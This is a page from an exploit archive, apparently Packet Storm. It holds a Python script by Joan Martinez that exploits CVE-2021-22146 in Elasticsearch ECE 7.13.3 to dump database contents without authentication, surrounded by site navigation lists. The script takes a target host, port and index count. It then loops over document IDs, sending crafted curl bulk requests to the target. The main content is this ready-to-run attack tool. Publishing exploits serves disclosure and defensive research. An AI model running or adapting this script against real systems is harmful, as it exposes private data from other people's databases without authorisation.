Elasticsearch ECE 7.13.3 Database Disclosure

Elasticsearch ECE 7.13.3 Database Disclosure: Posted Jul 26, 2021; Authored by Joan Martinez; Elasticsearch ECE version 7.13.3 anonymous database dumping exploit.; tags | exploit, info disclosure; advisories | CVE-2021-22146; SHA-256 | fca9927fbaec3c0c7e66a7316f382e0c4a0a308b7deb63b9e0b0e30c13e6579d; Download | Favorite | View

Elasticsearch ECE 7.13.3 Database Disclosure

# Exploit Title: Elasticsearch ECE 7.13.3 - Anonymous Database Dump
# Date: 2021-07-21
# Exploit Author: Joan Martinez @magichk
# Vendor Homepage: https://www.elastic.co/
# Software Link: https://www.elastic.co/
# Version: >= 7.10.0 to <= 7.13.3
# Tested on: Elastic ECE (Cloud)
# CVE : CVE-2021-22146
# Reference: https://discuss.elastic.co/t/elastic-cloud-enterprise-security-update/279180 

import os
import argparse
import sys

######### Check Arguments
def checkArgs():
  parser = argparse.ArgumentParser()
  parser = argparse.ArgumentParser(description='Elasticdump 1.0\n')
  parser.add_argument('-s', "--host", action="store",
            dest='host',
                      help="Host to attack.")
  parser.add_argument('-p', "--port", action="store",
            dest='port',
                      help="Elastic search port by default 9200 or 9201")
  parser.add_argument('-i', "--index", action="store",
            dest='index',
                      help="Index to dump (Example: 30)")


  args = parser.parse_args()
  if (len(sys.argv)==1) or (args.host==False) or (args.port==False) or (args.index==False and arg.dump==False) :
    parser.print_help(sys.stderr)
    sys.exit(1)
  return args

def banner():
    print("      _           _   _         _")
    print("  ___| | __ _ ___| |_(_) ___ __| |_   _ _ __ ___  _ __")
    print(" / _ \ |/ _` / __| __| |/ __/ _` | | | | '_ ` _ \| '_ \ ")
    print("|  __/ | (_| \__ \ |_| | (_| (_| | |_| | | | | | | |_) |")
    print(" \___|_|\__,_|___/\__|_|\___\__,_|\__,_|_| |_| |_| .__/")
    print("                                                 |_|")



def exploit(host,port,index):

  if (index != 0):
      final = int(index)
  else:
      final = 1000000000

  cont = 0
  while (cont <= final):
    os.system("curl -X POST \""+host+":"+port+"/_bulk\" -H 'Content-Type: application/x-ndjson' --data-binary $'{\x0d\x0a\"index\"  :  {\x0d\x0a \"_id\" :\""+str(cont)+"\"\x0d\x0a}\x0d\x0a}\x0d\x0a' -k -s")
    cont = cont + 1

if __name__ == "__main__":

  banner()
  args = checkArgs()
  if (args.index):
      exploit(args.host,args.port,args.index)
  else:
      exploit(args.host,args.port,0)

Top Authors In Last 30 Days

Red Hat 244 files
Ubuntu 86 files
Gentoo 31 files
Debian 17 files
tmrswrr 8 files
Sina Kheirkhah 7 files
indoushka 5 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files
bRpsd 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,082)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,456)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,351)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,673)
UNIX (9,429)
UnixWare (187)
Windows (6,667)
Other

Elasticsearch ECE 7.13.3 Database Disclosure

Elasticsearch ECE 7.13.3 Database Disclosure

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Elasticsearch ECE 7.13.3 Database Disclosure

Share This

Elasticsearch ECE 7.13.3 Database Disclosure

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems